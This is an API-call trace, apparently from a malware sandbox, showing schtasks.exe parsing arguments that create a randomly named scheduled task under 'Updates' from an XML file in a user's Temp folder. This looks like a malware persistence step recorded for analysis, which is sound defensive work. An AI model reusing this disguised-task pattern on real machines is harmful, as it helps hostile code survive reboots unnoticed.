[0153.990] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdf6b8, puLen=0xdf6bc | out: lplpBuffer=0xdf6b8*=0x296074, puLen=0xdf6bc) returned 1
[0153.994] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.994] _vsnwprintf (in: _Buffer=0x295ac8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdf6a0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0153.994] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdf6c8, puLen=0xdf6c4 | out: lplpBuffer=0xdf6c8*=0x295ea0, puLen=0xdf6c4) returned 1
[0153.994] lstrlenW (lpString="schtasks.exe") returned 12
[0153.994] lstrlenW (lpString="schtasks.exe") returned 12
[0153.994] lstrlenW (lpString=".EXE") returned 4
[0153.994] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0153.995] lstrlenW (lpString="schtasks.exe") returned 12
[0153.995] lstrlenW (lpString=".EXE") returned 4
[0153.995] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.995] lstrlenW (lpString="schtasks") returned 8
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295260
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295280
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2952a0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2952c0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294cb0
[0153.996] _memicmp (_Buf1=0x294cb0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xa0) returned 0x2966b8
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2952e0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295300
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295320
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294cc8
[0153.996] _memicmp (_Buf1=0x294cc8, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x200) returned 0x296760
[0153.997] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x296760, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0153.997] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x30) returned 0x296968
[0153.997] _vsnwprintf (in: _Buffer=0x2966b8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdf6a4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8) returned 1
[0153.997] GetProcessHeap () returned 0x280000
[0153.997] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cd8) returned 0x74e
[0153.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8 | out: hHeap=0x280000) returned 1
[0153.998] SetLastError (dwErrCode=0x0)
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="?") returned 1
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="create") returned 6
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="delete") returned 6
[0153.998] GetThreadLocale () returned 0x409
[0153.998] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.998] lstrlenW (lpString="query") returned 5
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="change") returned 6
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="run") returned 3
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="end") returned 3
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] lstrlenW (lpString="showsid") returned 7
[0153.999] GetThreadLocale () returned 0x409
[0153.999] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0153.999] SetLastError (dwErrCode=0x0)
[0153.999] SetLastError (dwErrCode=0x0)
[0153.999] lstrlenW (lpString="/Create") returned 7
[0153.999] lstrlenW (lpString="-/") returned 2
[0153.999] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0153.999] lstrlenW (lpString="?") returned 1
[0153.999] lstrlenW (lpString="?") returned 1
[0153.999] GetProcessHeap () returned 0x280000
[0153.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294ce0
[0153.999] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.999] GetProcessHeap () returned 0x280000
[0153.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xa) returned 0x294cf8
[0153.999] lstrlenW (lpString="Create") returned 6
[0153.999] GetProcessHeap () returned 0x280000
[0154.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294d10
[0154.000] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.000] GetProcessHeap () returned 0x280000
[0154.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295340
[0154.000] _vsnwprintf (in: _Buffer=0x294cf8, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|?|") returned 3
[0154.000] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|Create|") returned 8
[0154.000] lstrlenW (lpString="|?|") returned 3
[0154.000] lstrlenW (lpString="|Create|") returned 8
[0154.000] SetLastError (dwErrCode=0x490)
[0154.000] lstrlenW (lpString="create") returned 6
[0154.000] lstrlenW (lpString="create") returned 6
[0154.000] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.000] GetProcessHeap () returned 0x280000
[0154.000] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cf8) returned 1
[0154.000] GetProcessHeap () returned 0x280000
[0154.000] RtlReAllocateHeap (Heap=0x280000, Flags=0xc, Ptr=0x294cf8, Size=0x14) returned 0x295360
[0154.000] lstrlenW (lpString="Create") returned 6
[0154.000] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.000] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|create|") returned 8
[0154.000] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|Create|") returned 8
[0154.000] lstrlenW (lpString="|create|") returned 8
[0154.000] lstrlenW (lpString="|Create|") returned 8
[0154.001] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0154.001] SetLastError (dwErrCode=0x0)
[0154.001] SetLastError (dwErrCode=0x0)
[0154.001] SetLastError (dwErrCode=0x0)
[0154.001] lstrlenW (lpString="/TN") returned 3
[0154.001] lstrlenW (lpString="-/") returned 2
[0154.001] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.001] lstrlenW (lpString="?") returned 1
[0154.001] lstrlenW (lpString="?") returned 1
[0154.001] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.001] lstrlenW (lpString="TN") returned 2
[0154.001] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.001] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|?|") returned 3
[0154.001] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.001] lstrlenW (lpString="|?|") returned 3
[0154.001] lstrlenW (lpString="|TN|") returned 4
[0154.001] SetLastError (dwErrCode=0x490)
[0154.001] lstrlenW (lpString="create") returned 6
[0154.001] lstrlenW (lpString="create") returned 6
[0154.001] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] lstrlenW (lpString="TN") returned 2
[0154.002] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|create|") returned 8
[0154.002] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.002] lstrlenW (lpString="|create|") returned 8
[0154.002] lstrlenW (lpString="|TN|") returned 4
[0154.002] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0154.002] SetLastError (dwErrCode=0x490)
[0154.002] lstrlenW (lpString="delete") returned 6
[0154.002] lstrlenW (lpString="delete") returned 6
[0154.002] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] lstrlenW (lpString="TN") returned 2
[0154.002] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|delete|") returned 8
[0154.002] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.002] lstrlenW (lpString="|delete|") returned 8
[0154.002] lstrlenW (lpString="|TN|") returned 4
[0154.002] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0154.002] SetLastError (dwErrCode=0x490)
[0154.002] lstrlenW (lpString="query") returned 5
[0154.002] lstrlenW (lpString="query") returned 5
[0154.002] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.002] lstrlenW (lpString="TN") returned 2
[0154.002] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|query|") returned 7
[0154.003] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.003] lstrlenW (lpString="|query|") returned 7
[0154.003] lstrlenW (lpString="|TN|") returned 4
[0154.003] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0154.003] SetLastError (dwErrCode=0x490)
[0154.003] lstrlenW (lpString="change") returned 6
[0154.003] lstrlenW (lpString="change") returned 6
[0154.003] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] lstrlenW (lpString="TN") returned 2
[0154.003] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|change|") returned 8
[0154.003] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.003] lstrlenW (lpString="|change|") returned 8
[0154.003] lstrlenW (lpString="|TN|") returned 4
[0154.003] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0154.003] SetLastError (dwErrCode=0x490)
[0154.003] lstrlenW (lpString="run") returned 3
[0154.003] lstrlenW (lpString="run") returned 3
[0154.003] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] lstrlenW (lpString="TN") returned 2
[0154.003] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.003] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|run|") returned 5
[0154.004] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.004] lstrlenW (lpString="|run|") returned 5
[0154.004] lstrlenW (lpString="|TN|") returned 4
[0154.004] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0154.004] SetLastError (dwErrCode=0x490)
[0154.004] lstrlenW (lpString="end") returned 3
[0154.004] lstrlenW (lpString="end") returned 3
[0154.004] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] lstrlenW (lpString="TN") returned 2
[0154.004] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] _vsnwprintf (in: _Buffer=0x295360, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|end|") returned 5
[0154.004] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.004] lstrlenW (lpString="|end|") returned 5
[0154.004] lstrlenW (lpString="|TN|") returned 4
[0154.004] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0154.004] SetLastError (dwErrCode=0x490)
[0154.004] lstrlenW (lpString="showsid") returned 7
[0154.004] lstrlenW (lpString="showsid") returned 7
[0154.004] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] GetProcessHeap () returned 0x280000
[0154.004] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295360) returned 1
[0154.004] GetProcessHeap () returned 0x280000
[0154.004] RtlReAllocateHeap (Heap=0x280000, Flags=0xc, Ptr=0x295360, Size=0x16) returned 0x295380
[0154.004] lstrlenW (lpString="TN") returned 2
[0154.004] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.004] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|showsid|") returned 9
[0154.005] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|TN|") returned 4
[0154.005] lstrlenW (lpString="|showsid|") returned 9
[0154.005] lstrlenW (lpString="|TN|") returned 4
[0154.005] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="/TN") returned 3
[0154.005] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="/TN") returned 3
[0154.005] GetProcessHeap () returned 0x280000
[0154.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x8) returned 0x2969a0
[0154.005] GetProcessHeap () returned 0x280000
[0154.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295360
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.005] lstrlenW (lpString="-/") returned 2
[0154.005] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.005] StrChrIW (lpStart="Updates\\nFxIoujoILCO", wMatch=0x3a) returned 0x0
[0154.005] SetLastError (dwErrCode=0x490)
[0154.005] SetLastError (dwErrCode=0x0)
[0154.005] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.006] GetProcessHeap () returned 0x280000
[0154.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x2a) returned 0x2969b0
[0154.006] GetProcessHeap () returned 0x280000
[0154.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953a0
[0154.006] SetLastError (dwErrCode=0x0)
[0154.006] SetLastError (dwErrCode=0x0)
[0154.006] lstrlenW (lpString="/XML") returned 4
[0154.006] lstrlenW (lpString="-/") returned 2
[0154.006] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.006] lstrlenW (lpString="?") returned 1
[0154.006] lstrlenW (lpString="?") returned 1
[0154.006] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] lstrlenW (lpString="XML") returned 3
[0154.006] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|?|") returned 3
[0154.006] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.006] lstrlenW (lpString="|?|") returned 3
[0154.006] lstrlenW (lpString="|XML|") returned 5
[0154.006] SetLastError (dwErrCode=0x490)
[0154.006] lstrlenW (lpString="create") returned 6
[0154.006] lstrlenW (lpString="create") returned 6
[0154.006] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] lstrlenW (lpString="XML") returned 3
[0154.006] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.006] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|create|") returned 8
[0154.006] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.006] lstrlenW (lpString="|create|") returned 8
[0154.007] lstrlenW (lpString="|XML|") returned 5
[0154.007] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0154.007] SetLastError (dwErrCode=0x490)
[0154.007] lstrlenW (lpString="delete") returned 6
[0154.007] lstrlenW (lpString="delete") returned 6
[0154.007] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] lstrlenW (lpString="XML") returned 3
[0154.007] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|delete|") returned 8
[0154.007] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.007] lstrlenW (lpString="|delete|") returned 8
[0154.007] lstrlenW (lpString="|XML|") returned 5
[0154.007] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0154.007] SetLastError (dwErrCode=0x490)
[0154.007] lstrlenW (lpString="query") returned 5
[0154.007] lstrlenW (lpString="query") returned 5
[0154.007] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] lstrlenW (lpString="XML") returned 3
[0154.007] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.007] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|query|") returned 7
[0154.007] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.007] lstrlenW (lpString="|query|") returned 7
[0154.007] lstrlenW (lpString="|XML|") returned 5
[0154.007] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0154.007] SetLastError (dwErrCode=0x490)
[0154.007] lstrlenW (lpString="change") returned 6
[0154.008] lstrlenW (lpString="change") returned 6
[0154.008] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] lstrlenW (lpString="XML") returned 3
[0154.008] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|change|") returned 8
[0154.008] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.008] lstrlenW (lpString="|change|") returned 8
[0154.008] lstrlenW (lpString="|XML|") returned 5
[0154.008] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0154.008] SetLastError (dwErrCode=0x490)
[0154.008] lstrlenW (lpString="run") returned 3
[0154.008] lstrlenW (lpString="run") returned 3
[0154.008] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] lstrlenW (lpString="XML") returned 3
[0154.008] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|run|") returned 5
[0154.008] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.008] lstrlenW (lpString="|run|") returned 5
[0154.008] lstrlenW (lpString="|XML|") returned 5
[0154.008] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0154.008] SetLastError (dwErrCode=0x490)
[0154.008] lstrlenW (lpString="end") returned 3
[0154.008] lstrlenW (lpString="end") returned 3
[0154.008] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.008] lstrlenW (lpString="XML") returned 3
[0154.009] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.009] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|end|") returned 5
[0154.009] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.009] lstrlenW (lpString="|end|") returned 5
[0154.009] lstrlenW (lpString="|XML|") returned 5
[0154.009] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] lstrlenW (lpString="showsid") returned 7
[0154.009] lstrlenW (lpString="showsid") returned 7
[0154.009] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.009] lstrlenW (lpString="XML") returned 3
[0154.009] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.009] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|showsid|") returned 9
[0154.009] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdf68c | out: _Buffer="|XML|") returned 5
[0154.009] lstrlenW (lpString="|showsid|") returned 9
[0154.009] lstrlenW (lpString="|XML|") returned 5
[0154.009] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] SetLastError (dwErrCode=0x0)
[0154.009] lstrlenW (lpString="/XML") returned 4
[0154.009] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0154.009] SetLastError (dwErrCode=0x490)
[0154.009] SetLastError (dwErrCode=0x0)
[0154.009] lstrlenW (lpString="/XML") returned 4
[0154.010] GetProcessHeap () returned 0x280000
[0154.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xa) returned 0x294cf8
[0154.010] GetProcessHeap () returned 0x280000
[0154.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953c0
[0154.010] SetLastError (dwErrCode=0x0)
[0154.010] SetLastError (dwErrCode=0x0)
[0154.010] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.010] lstrlenW (lpString="-/") returned 2
[0154.010] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0154.010] SetLastError (dwErrCode=0x490)
[0154.010] SetLastError (dwErrCode=0x490)
[0154.010] SetLastError (dwErrCode=0x0)
[0154.010] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.010] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp"
[0154.010] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.010] GetProcessHeap () returned 0x280000
[0154.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294d28
[0154.027] _memicmp (_Buf1=0x294d28, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xc) returned 0x294d40
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294d58
[0154.027] _memicmp (_Buf1=0x294d58, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x68) returned 0x2969e8
[0154.027] SetLastError (dwErrCode=0x7a)
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] lstrlenW (lpString="C") returned 1
[0154.027] SetLastError (dwErrCode=0x490)
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x64) returned 0x296a58
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953e0
[0154.027] SetLastError (dwErrCode=0x0)
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] GetProcessHeap () returned 0x280000
[0154.027] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0) returned 1
[0154.027] GetProcessHeap () returned 0x280000
